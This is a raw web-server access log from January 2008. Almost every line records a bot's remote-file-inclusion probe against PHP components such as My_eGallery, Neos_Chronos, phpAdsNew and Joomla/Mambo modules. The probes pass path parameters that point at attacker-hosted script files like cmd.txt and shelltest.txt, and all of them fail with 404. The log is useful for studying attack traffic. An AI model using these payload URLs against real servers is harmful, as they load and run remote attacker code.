216.65.116.80 - - [25/Jan/2008:06:52:34 -0800] "GET /logs/errors.php?error=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
209.35.191.105 - - [25/Jan/2008:06:52:34 -0800] "GET /logs/access.log/config.php?path_to_root=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [25/Jan/2008:06:52:35 -0800] "GET /config.php?path_to_root=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [25/Jan/2008:06:52:37 -0800] "GET /logs/config.php?path_to_root=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:52:48 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:53:16 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:53:16 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:53:16 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:53:38 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:53:38 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:53:39 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:53:46 -0800] "GET /logs/access_080106.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:53:46 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:53:46 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:06:54:00 -0800] "GET /logs/access_071121.log//components/com_simpleboard/image_upload.php?sbp=http://deniamusic.com/keplek.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:08 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:09 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:09 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:13 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:22 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:22 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:22 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [25/Jan/2008:06:54:37 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:50 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:50 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:54:50 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:06:55:01 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [25/Jan/2008:06:55:01 -0800] "GET /logs/access.log/errors.php?error=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:55:01 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:55:01 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:55:02 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.148.17 - - [25/Jan/2008:06:56:19 -0800] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [25/Jan/2008:06:56:20 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [25/Jan/2008:06:56:20 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.185.237.20 - - [25/Jan/2008:06:56:36 -0800] "GET //index.php?body=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.185.237.20 - - [25/Jan/2008:06:56:36 -0800] "GET /logs//index.php?body=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:56:54 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:57:02 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:57:03 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:57:03 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:57:11 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:57:12 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:57:12 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.148.17 - - [25/Jan/2008:06:57:20 -0800] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:57:28 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:57:32 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:57:33 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:57:33 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:57:37 -0800] "GET /logs/access_071231.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:58:02 -0800] "GET /logs/access_071231.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:06:58:24 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:06:58:24 -0800] "GET //Neos_Chronos/header.php?base_folder=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:58:29 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:58:30 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:06:58:30 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:59:00 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:59:00 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:06:59:01 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:06:59:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [25/Jan/2008:06:59:11 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:59:30 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:59:31 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:06:59:31 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:07:02:50 -0800] "GET /logs/access_080104.log//phpAdsNew/view.inc.php?phpAds_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:07:02:50 -0800] "GET //phpAdsNew/view.inc.php?phpAds_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [25/Jan/2008:07:02:51 -0800] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:26 -0800] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:27 -0800] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:27 -0800] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:28 -0800] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
81.26.216.70 - - [25/Jan/2008:07:03:34 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.26.216.70 - - [25/Jan/2008:07:03:34 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:38 -0800] "GET /logs/esupport/admin/autoclose.php?subd=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:38 -0800] "GET /logs/esupport/admin/autoclose.php?subd=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:43 -0800] "GET /esupport/admin/autoclose.php?subd=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:43 -0800] "GET /esupport/admin/autoclose.php?subd=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:49 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:49 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:49 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:07:03:49 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:07:05:02 -0800] "GET /logs/access_080104.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:07:05:25 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:07:05:25 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:07:05:25 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.202.124.115 - - [25/Jan/2008:07:05:47 -0800] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://sbn.poilpark.net/docu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.124.115 - - [25/Jan/2008:07:05:52 -0800] "GET //Neos_Chronos/header.php?base_folder=http://sbn.poilpark.net/docu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.124.115 - - [25/Jan/2008:07:05:53 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://sbn.poilpark.net/docu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:07:06:10 -0800] "GET /esupport/admin/autoclose.php?subd=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:07:06:10 -0800] "GET /logs/esupport/admin/autoclose.php?subd=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:07:06:10 -0800] "GET /esupport/admin/autoclose.php?subd=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:07:06:10 -0800] "GET /logs/esupport/admin/autoclose.php?subd=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:07:06:36 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:07:06:44 -0800] "GET /logs/access_080104.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.124.115 - - [25/Jan/2008:07:06:56 -0800] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://sbn.poilpark.net/docu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:07:07:03 -0800] "GET /logs/access_071228.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:07:09:04 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:09:28 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:09:28 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:09:29 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.193.127.94 - - [25/Jan/2008:07:09:42 -0800] "GET //Neos_Chronos/header.php?base_folder=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
81.193.127.94 - - [25/Jan/2008:07:09:42 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:11 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:12 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:14 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:14 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:19 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:19 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:20 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:29 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:10:30 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:12:17 -0800] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:07:12:20 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:07:12:21 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:12:23 -0800] "GET //includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:07:12:23 -0800] "GET /logs//includes/get_header.php?vwar_root=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
